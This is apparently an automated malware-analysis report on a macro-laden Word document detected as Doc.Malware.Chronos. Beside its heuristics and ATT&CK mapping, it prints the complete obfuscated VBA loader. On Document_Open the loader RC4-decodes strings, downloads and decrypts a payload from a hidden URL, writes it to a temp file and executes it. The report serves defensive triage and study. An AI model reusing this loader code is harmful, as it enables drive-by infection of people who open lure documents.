MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample is an OOXML document containing obfuscated VBA macros, specifically a Document_Open auto-exec loader. The document body acts as a lure, instructing the user to enable editing and content, which is a common tactic for macro-based malware. The VBA code uses CreateObject and GetObject calls, and is identified by ClamAV as Doc.Malware.Chronos-6897935-0, indicating a known malware family.
Heuristics 11
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject 87, 74 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set CE2lwDMd = CreateObject(MaBsFEfE(BMcjvCYuk9NqL("8E51CCACED02953B30B546EDBAD9E36FAE80E0E5"), "H8bS")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject 87, 74 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
WyPEneR1fVqltip = Environ(MaBsFEfE(BMcjvCYuk9NqL("618B6F36D98BC4"), "W79b6")) & "\" & Qj5X6Lgjmii & MaBsFEfE(BMcjvCYuk9NqL("4524A4BB"), "Anw4N68nK9edrYb") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12593 bytes |
SHA-256: 94869b0834b1d85d70181ac0dedcc718abe50d03718b42a256f0a9968fb26cb5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
98 of 179 identifiers look randomly generated (e.g. 'GYgo6gx6HrzSXb3mXuTk1uLzav0') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Function MaBsFEfE(ByVal JURiGTn0Wmz7SQz As String, ByVal SwF8ql As String) As String
Dim Jr2eyQ3jnuX As Long, YVJZjEwYd1gCJU As Long
Jr2eyQ3jnuX = 49
YVJZjEwYd1gCJU = 46
If Jr2eyQ3jnuX + YVJZjEwYd1gCJU > 2 Then
YVJZjEwYd1gCJU = Jr2eyQ3jnuX + 55
Else
MsgBox 27
End If
On Error Resume Next
Dim QM5e8r35GNMq As Long, CLDnffAhSookX4i As Long
QM5e8r35GNMq = 30
CLDnffAhSookX4i = 75
If QM5e8r35GNMq + CLDnffAhSookX4i > 2 Then
CLDnffAhSookX4i = QM5e8r35GNMq + 65
Else
MsgBox 22
End If
Dim YD4hAoCklHz(0 To 255) As Integer, C5GNMqE As Long, MYaJNVH As Long, KFUIxef18Q3RON As Long, QMQlIQYWm2Xw79() As Byte, X7C3v0nlaFM8Qr() As Byte, LGKPa31f As Byte
Dim GYgo6gx6HrzSXb3mXuTk1uLzav0 As Long, RefcRCbRG As Long
GYgo6gx6HrzSXb3mXuTk1uLzav0 = 31
RefcRCbRG = 48
If GYgo6gx6HrzSXb3mXuTk1uLzav0 + RefcRCbRG > 2 Then
RefcRCbRG = GYgo6gx6HrzSXb3mXuTk1uLzav0 + 49
Else
MsgBox 46
End If
QMQlIQYWm2Xw79() = StrConv(SwF8ql, vbFromUnicode)
Dim Npr1i As Long, Qr9b As Long
Npr1i = 21
Qr9b = 74
If Npr1i + Qr9b > 2 Then
Qr9b = Npr1i + 13
Else
MsgBox 72
End If
For C5GNMqE = 0 To 255
YD4hAoCklHz(C5GNMqE) = C5GNMqE
Next C5GNMqE
C5GNMqE = 0
MYaJNVH = 0
KFUIxef18Q3RON = 0
For C5GNMqE = 0 To 255
MYaJNVH = (MYaJNVH + YD4hAoCklHz(C5GNMqE) + QMQlIQYWm2Xw79(C5GNMqE Mod Len(SwF8ql))) Mod 256
LGKPa31f = YD4hAoCklHz(C5GNMqE)
YD4hAoCklHz(C5GNMqE) = YD4hAoCklHz(MYaJNVH)
YD4hAoCklHz(MYaJNVH) = LGKPa31f
Next C5GNMqE
C5GNMqE = 0
MYaJNVH = 0
KFUIxef18Q3RON = 0
X7C3v0nlaFM8Qr() = StrConv(JURiGTn0Wmz7SQz, vbFromUnicode)
For C5GNMqE = 0 To Len(JURiGTn0Wmz7SQz)
MYaJNVH = (MYaJNVH + 1) Mod 256
KFUIxef18Q3RON = (KFUIxef18Q3RON + YD4hAoCklHz(MYaJNVH)) Mod 256
LGKPa31f = YD4hAoCklHz(MYaJNVH)
YD4hAoCklHz(MYaJNVH) = YD4hAoCklHz(KFUIxef18Q3RON)
YD4hAoCklHz(KFUIxef18Q3RON) = LGKPa31f
X7C3v0nlaFM8Qr(C5GNMqE) = X7C3v0nlaFM8Qr(C5GNMqE) Xor (YD4hAoCklHz((YD4hAoCklHz(MYaJNVH) + YD4hAoCklHz(KFUIxef18Q3RON)) Mod 256))
Next C5GNMqE
Dim NjzHnZyS As Long, LEOWdWEAaKEUVwOEr As Long
NjzHnZyS = 94
LEOWdWEAaKEUVwOEr = 39
If NjzHnZyS + LEOWdWEAaKEUVwOEr > 2 Then
LEOWdWEAaKEUVwOEr = NjzHnZyS + 93
Else
MsgBox 3
End If
MaBsFEfE = StrConv(X7C3v0nlaFM8Qr, vbUnicode)
Dim TCkx As Long, AqpMsjHv6U3 As Long
TCkx = 51
AqpMsjHv6U3 = 83
If TCkx + AqpMsjHv6U3 > 2 Then
AqpMsjHv6U3 = TCkx + 35
Else
MsgBox 33
End If
End Function
Function BMcjvCYuk9NqL(VU6wabQEO8 As String) As String
Dim WATN7 As Long, PZRk1aJaV1N As Long
WATN7 = 91
PZRk1aJaV1N = 9
If WATN7 + PZRk1aJaV1N > 2 Then
PZRk1aJaV1N = WATN7 + 10
Else
MsgBox 7
End If
Dim GAtQRakv22eLcq As Integer
Dim CMyibo6BGzupCB As Long, OB063bGy As Long
CMyibo6BGzupCB = 61
OB063bGy = 98
If CMyibo6BGzupCB + OB063bGy > 2 Then
OB063bGy = CMyibo6BGzupCB + 14
Else
MsgBox 93
End If
For GAtQRakv22eLcq = 1 To Len(VU6wabQEO8) Step 2
BMcjvCYuk9NqL = BMcjvCYuk9NqL & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(VU6wabQEO8, GAtQRakv22eLcq, 2)))
Next
Dim Hcc1lmom9xfEwO As Long, M9NYeznhvxg As Long
Hcc1lmom9xfEwO = 90
M9NYeznhvxg = 40
If Hcc1lmom9xfEwO + M9NYeznhvxg > 2 Then
M9NYeznhvxg = Hcc1lmom9xfEwO + 90
Else
MsgBox 12
End If
End Function
Sub KkrOGfYL3PoMt()
Dim Y0l44CYhLC As Long, MFFDtna5SeLrFE3 As Long
Y0l44CYhLC = 58
MFFDtna5SeLrFE3 = 60
If Y0l44CYhLC + MFFDtna5SeLrFE3 > 2 Then
MFFDtna5SeLrFE3 = Y0l44CYhLC + 2
Else
MsgBox 5
End If
XWxL91hpyNMlgx = CVErr(79)
Err.Raise 44
BaAqDIasUK = CStr(77)
Sin 50
Partition 58, 9, 85, 80
Month 68
Second 4
Hour 98
DoEvents
If CDbl(42) = True Then CE0luKvH = 84
Join QJSjxQx6pr5, 31
P1skE6Ks = Day(43)
Resume
NPer 35, 57, 64
Rate 92, 33, 36
If CDate(54) = True Then KJEa7qCHEFmLEH = 7363
SHjBE2EV46zi = CVDate(20)
Sqr 50
TimeValue 86
Stop
Beep
TimeSerial 25, 62, 51
Load PNThx38wbaR0at0zk
Tan 31
ChDrive 91
Rnd
IsDate 9
DateDiff "VU438GVpO7", 10, 7
G2WTrcTkGd = CVar(17)
GetObject 87, 74
Dim FmC6fInp8DNM As Long, XnyxpRtlVOz51gnt As Long
FmC6fInp8DNM = 2
XnyxpRtlVOz51gnt = 57
If FmC6fInp8DNM + XnyxpRtlVOz51gnt > 2 Then
XnyxpRtlVOz51gnt = FmC6fInp8DNM + 17
Else
MsgBox 86
End If
End Sub
Function Qj5X6Lgjmii() As String
Dim Iabvs3ku As Long, HOscyaIzBh3f As Long
Iabvs3ku = 84
HOscyaIzBh3f = 84
If Iabvs3ku + HOscyaIzBh3f > 2 Then
HOscyaIzBh3f = Iabvs3ku + 37
Else
MsgBox 53
End If
Dim Yi7hKesaU() As Byte, YJbFF3gIB() As Byte, Rix6HrzS60 As Long, I6KCSoIJDP2t7zqNG As Long, R0GZaEuwGEzt3ea As String, I2z6MIcld3x9 As String, H9Fho3lO8 As Long
Dim PFXY55MG3o As Long, D7BUxTZO As Long
PFXY55MG3o = 17
D7BUxTZO = 86
If PFXY55MG3o + D7BUxTZO > 2 Then
D7BUxTZO = PFXY55MG3o + 78
Else
MsgBox 56
End If
H9Fho3lO8 = 0
Dim Fir0W2Td As Long, L6CeBO5wkdJZg As Long
Fir0W2Td = 32
L6CeBO5wkdJZg = 41
If Fir0W2Td + L6CeBO5wkdJZg > 2 Then
L6CeBO5wkdJZg = Fir0W2Td + 13
Else
MsgBox 26
End If
ALXupE44GY63c9WQs:
Dim Ac6Kax4jtSEQ As Long, PWEfLJS0ZW6 As Long
Ac6Kax4jtSEQ = 52
PWEfLJS0ZW6 = 9
If Ac6Kax4jtSEQ + PWEfLJS0ZW6 > 2 Then
PWEfLJS0ZW6 = Ac6Kax4jtSEQ + 38
Else
MsgBox 74
End If
Randomize
I2z6MIcld3x9 = Int(30 * Rnd)
If I2z6MIcld3x9 < 4 Then GoTo ALXupE44GY63c9WQs
H9Fho3lO8 = I2z6MIcld3x9
If H9Fho3lO8 > 0& Then
Dim Fc0LHE4K As Long, QGIQFPQaLQVA As Long
Fc0LHE4K = 56
QGIQFPQaLQVA = 67
If Fc0LHE4K + QGIQFPQaLQVA > 2 Then
QGIQFPQaLQVA = Fc0LHE4K + 60
Else
MsgBox 82
End If
R0GZaEuwGEzt3ea = MaBsFEfE(BMcjvCYuk9NqL("728D4E8FB73C33313A9B"), "QyiRWyDcI5W")
Randomize
Yi7hKesaU = R0GZaEuwGEzt3ea
Rix6HrzS60 = Len(R0GZaEuwGEzt3ea) - 1&
H9Fho3lO8 = (H9Fho3lO8 * 2&) - 1&
ReDim YJbFF3gIB(H9Fho3lO8) As Byte
Dim Vn4w2pOpOdit As Long, TDu0gUsrmHAocwu As Long
Vn4w2pOpOdit = 73
TDu0gUsrmHAocwu = 68
If Vn4w2pOpOdit + TDu0gUsrmHAocwu > 2 Then
TDu0gUsrmHAocwu = Vn4w2pOpOdit + 57
Else
MsgBox 92
End If
For I6KCSoIJDP2t7zqNG = 0& To H9Fho3lO8 Step 2&
YJbFF3gIB(I6KCSoIJDP2t7zqNG) = Yi7hKesaU(CLng(Rix6HrzS60 * Rnd) * 2&)
Next
Dim EEYiJ0RhpTMiFq As Long, YrD4eepQPQL As Long
EEYiJ0RhpTMiFq = 85
YrD4eepQPQL = 81
If EEYiJ0RhpTMiFq + YrD4eepQPQL > 2 Then
YrD4eepQPQL = EEYiJ0RhpTMiFq + 46
Else
MsgBox 24
End If
End If
Dim TSSXVbGgCi As Long, VKCeH As Long
TSSXVbGgCi = 22
VKCeH = 40
If TSSXVbGgCi + VKCeH > 2 Then
VKCeH = TSSXVbGgCi + 85
Else
MsgBox 76
End If
Qj5X6Lgjmii = YJbFF3gIB
Dim OYQBf3iTQY As Long, YHo28xwWJmEFp8BV As Long
OYQBf3iTQY = 35
YHo28xwWJmEFp8BV = 30
If OYQBf3iTQY + YHo28xwWJmEFp8BV > 2 Then
YHo28xwWJmEFp8BV = OYQBf3iTQY + 18
Else
MsgBox 53
End If
End Function
Sub Document_Open()
Dim NLqBKOsnuu9TMJ3g5 As Long, P2Q As Long
NLqBKOsnuu9TMJ3g5 = 31
P2Q = 86
If NLqBKOsnuu9TMJ3g5 + P2Q > 2 Then
P2Q = NLqBKOsnuu9TMJ3g5 + 46
Else
MsgBox 42
End If
Dim R3BCe7Nyjomb As Long, Shh7XQiLs2znZ1 As Long, XWiVzDtY4wm As Long
Dim BQx8dnJf3iTQY As Long, U2cUPIFmMoqm As Long
BQx8dnJf3iTQY = 13
U2cUPIFmMoqm = 69
If BQx8dnJf3iTQY + U2cUPIFmMoqm > 2 Then
U2cUPIFmMoqm = BQx8dnJf3iTQY + 35
Else
MsgBox 74
End If
R3BCe7Nyjomb = 962534946: Shh7XQiLs2znZ1 = 0: XWiVzDtY4wm = 0
Dim Ga4uho0txFxDb As Long, YYTeV8MG4dd As Long
Ga4uho0txFxDb = 49
YYTeV8MG4dd = 84
If Ga4uho0txFxDb + YYTeV8MG4dd > 2 Then
YYTeV8MG4dd = Ga4uho0txFxDb + 79
Else
MsgBox 23
End If
For Shh7XQiLs2znZ1 = 1 To R3BCe7Nyjomb
XWiVzDtY4wm = XWiVzDtY4wm + 1
Next Shh7XQiLs2znZ1
Dim SGjE1zShy5zk As Long, INTjkzL8LBIUxOkA5 As Long
SGjE1zShy5zk = 89
INTjkzL8LBIUxOkA5 = 12
If SGjE1zShy5zk + INTjkzL8LBIUxOkA5 > 2 Then
INTjkzL8LBIUxOkA5 = SGjE1zShy5zk + 45
Else
MsgBox 73
End If
If XWiVzDtY4wm = R3BCe7Nyjomb Then
Dim JXPlXw As Long, Hberlrbkp0M4L As Long
JXPlXw = 15
Hberlrbkp0M4L = 14
If JXPlXw + Hberlrbkp0M4L > 2 Then
Hberlrbkp0M4L = JXPlXw + 89
Else
MsgBox 63
End If
HF7M3rAhTyhkDPfJ
Dim GPwXs04K7Fm7 As Long, XySmheJnEPC1T3 As Long
GPwXs04K7Fm7 = 64
XySmheJnEPC1T3 = 91
If GPwXs04K7Fm7 + XySmheJnEPC1T3 > 2 Then
XySmheJnEPC1T3 = GPwXs04K7Fm7 + 84
Else
MsgBox 51
End If
Else
Dim EZ2Jww As Long, N5rAG5h7ggJSA0 As Long
EZ2Jww = 48
N5rAG5h7ggJSA0 = 15
If EZ2Jww + N5rAG5h7ggJSA0 > 2 Then
N5rAG5h7ggJSA0 = EZ2Jww + 14
Else
MsgBox 89
End If
KkrOGfYL3PoMt
Dim Scdh91A9rSk4vg As Long, GJ4tdk As Long
Scdh91A9rSk4vg = 51
GJ4tdk = 6
If Scdh91A9rSk4vg + GJ4tdk > 2 Then
GJ4tdk = Scdh91A9rSk4vg + 43
Else
MsgBox 3
End If
End If
Dim LJnTAARThBj As Long, JHSQw As Long
LJnTAARThBj = 56
JHSQw = 89
If LJnTAARThBj + JHSQw > 2 Then
JHSQw = LJnTAARThBj + 91
Else
MsgBox 32
End If
End Sub
Sub PZtmjQzzHC07b(VOFHLn1EJFTZB6g As Long)
Dim AfzxV1bNiBXPlX As Long, EBvn8f6flrbkp0M4L As Long
AfzxV1bNiBXPlX = 44
EBvn8f6flrbkp0M4L = 59
If AfzxV1bNiBXPlX + EBvn8f6flrbkp0M4L > 2 Then
EBvn8f6flrbkp0M4L = AfzxV1bNiBXPlX + 29
Else
MsgBox 20
End If
Dim XkjFj2QDmAsbZ7 As Long
Dim FGNW7hBP As Long, RvWGE As Long
FGNW7hBP = 84
RvWGE = 13
If FGNW7hBP + RvWGE > 2 Then
RvWGE = FGNW7hBP + 27
Else
MsgBox 30
End If
XkjFj2QDmAsbZ7 = Timer + VOFHLn1EJFTZB6g
Do While Timer < XkjFj2QDmAsbZ7
DoEvents
Loop
Dim LqRTGuwRL As Long, QixGbU4ogfpLPFVfekMEAMQ7h As Long
LqRTGuwRL = 54
QixGbU4ogfpLPFVfekMEAMQ7h = 74
If LqRTGuwRL + QixGbU4ogfpLPFVfekMEAMQ7h > 2 Then
QixGbU4ogfpLPFVfekMEAMQ7h = LqRTGuwRL + 41
Else
MsgBox 41
End If
End Sub
Sub HF7M3rAhTyhkDPfJ()
Dim EFWpreXIqRTGuw As Long, ARLs32gVP As Long
EFWpreXIqRTGuw = 27
ARLs32gVP = 85
If EFWpreXIqRTGuw + ARLs32gVP > 2 Then
ARLs32gVP = EFWpreXIqRTGuw + 55
Else
MsgBox 47
End If
Dim WyPEneR1fVqltip As String, CE2lwDMd As Object, PdEsrXHkQXeCiecls As Integer
Dim AtojcJ As Long, Rpfce3Hwrd60J As Long
AtojcJ = 49
Rpfce3Hwrd60J = 90
If AtojcJ + Rpfce3Hwrd60J > 2 Then
Rpfce3Hwrd60J = AtojcJ + 93
Else
MsgBox 12
End If
WyPEneR1fVqltip = Environ(MaBsFEfE(BMcjvCYuk9NqL("618B6F36D98BC4"), "W79b6")) & "\" & Qj5X6Lgjmii & MaBsFEfE(BMcjvCYuk9NqL("4524A4BB"), "Anw4N68nK9edrYb")
Dim MheNRg75P7ZTEw As Long, RGGaaER4 As Long
MheNRg75P7ZTEw = 60
RGGaaER4 = 74
If MheNRg75P7ZTEw + RGGaaER4 > 2 Then
RGGaaER4 = MheNRg75P7ZTEw + 33
Else
MsgBox 84
End If
Set CE2lwDMd = CreateObject(MaBsFEfE(BMcjvCYuk9NqL("8E51CCACED02953B30B546EDBAD9E36FAE80E0E5"), "H8bS"))
Dim BceZf4U As Long, Coh0JFVPgtfUH As Long
BceZf4U = 36
Coh0JFVPgtfUH = 74
If BceZf4U + Coh0JFVPgtfUH > 2 Then
Coh0JFVPgtfUH = BceZf4U + 85
Else
MsgBox 1
End If
CE2lwDMd.Open MaBsFEfE(BMcjvCYuk9NqL("836164"), "B1BxxRGzSV"), MaBsFEfE(BMcjvCYuk9NqL("52D99CE0A42B23F27B7FD425B3EE08CA86896976FF9F478F7E5609"), "MIt5DfyW8j"), False
Dim VKBmlKj5 As Long, MtMgvIyTeE As Long
VKBmlKj5 = 96
MtMgvIyTeE = 93
If VKBmlKj5 + MtMgvIyTeE > 2 Then
MtMgvIyTeE = VKBmlKj5 + 3
Else
MsgBox 74
End If
CE2lwDMd.setRequestHeader MaBsFEfE(BMcjvCYuk9NqL("FD008782CB83C0EAFFC7"), "CSCovRJYgRl"), MaBsFEfE(BMcjvCYuk9NqL("C2105553AB2F3B7331F3FA"), "PQNIs4qqbbEltUANv")
CE2lwDMd.send
If CE2lwDMd.Status = 200 Then
Dim YIm9gb17zMxolNGr As Long, QspxbewzELA6 As Long
YIm9gb17zMxolNGr = 21
QspxbewzELA6 = 20
If YIm9gb17zMxolNGr + QspxbewzELA6 > 2 Then
QspxbewzELA6 = YIm9gb17zMxolNGr + 50
Else
MsgBox 57
End If
PdEsrXHkQXeCiecls = FreeFile
Open WyPEneR1fVqltip For Binary Access Write Lock Write As #PdEsrXHkQXeCiecls
Put #PdEsrXHkQXeCiecls, , MaBsFEfE(StrConv(CE2lwDMd.ResponseBody, vbUnicode), MaBsFEfE(BMcjvCYuk9NqL("5D4EF42C6D88DC66EF"), "RH7D3L73cCFfyo"))
Close #PdEsrXHkQXeCiecls
Dim RgtfUHJdqwt As Long, SuRV1GPUVTADp6g As Long
RgtfUHJdqwt = 61
SuRV1GPUVTADp6g = 98
If RgtfUHJdqwt + SuRV1GPUVTADp6g > 2 Then
SuRV1GPUVTADp6g = RgtfUHJdqwt + 59
Else
MsgBox 6
End If
PZtmjQzzHC07b 1
Dim HEDwhqaVA6znFhep As Long, Qj29t0lfA As Long
HEDwhqaVA6znFhep = 75
Qj29t0lfA = 15
If HEDwhqaVA6znFhep + Qj29t0lfA > 2 Then
Qj29t0lfA = HEDwhqaVA6znFhep + 70
Else
MsgBox 78
End If
CreateObject(MaBsFEfE(BMcjvCYuk9NqL("D53BCCA56976A79042C898A94B"), "R7FYxU")).Run """" & WyPEneR1fVqltip & """"
Dim PMbAJ As Long, LkofAuYIJJ4kG As Long
PMbAJ = 30
LkofAuYIJJ4kG = 72
If PMbAJ + LkofAuYIJJ4kG > 2 Then
LkofAuYIJJ4kG = PMbAJ + 96
Else
MsgBox 25
End If
End If
Dim CQiJ0mqg As Long, Tt2ZOJhlqvAk As Long
CQiJ0mqg = 97
Tt2ZOJhlqvAk = 21
If CQiJ0mqg + Tt2ZOJhlqvAk > 2 Then
Tt2ZOJhlqvAk = CQiJ0mqg + 98
Else
MsgBox 93
End If
Set CE2lwDMd = Nothing
Dim G2AV3eGaLpIs3yOFB As Long, IiB6kJ4t2 As Long
G2AV3eGaLpIs3yOFB = 1
IiB6kJ4t2 = 59
If G2AV3eGaLpIs3yOFB + IiB6kJ4t2 > 2 Then
IiB6kJ4t2 = G2AV3eGaLpIs3yOFB + 11
Else
MsgBox 82
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |
SHA-256: c1f25cb78481992a24af36ffeeb5932377e4e174e0f7f1fdb9d33cf73b892199 |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.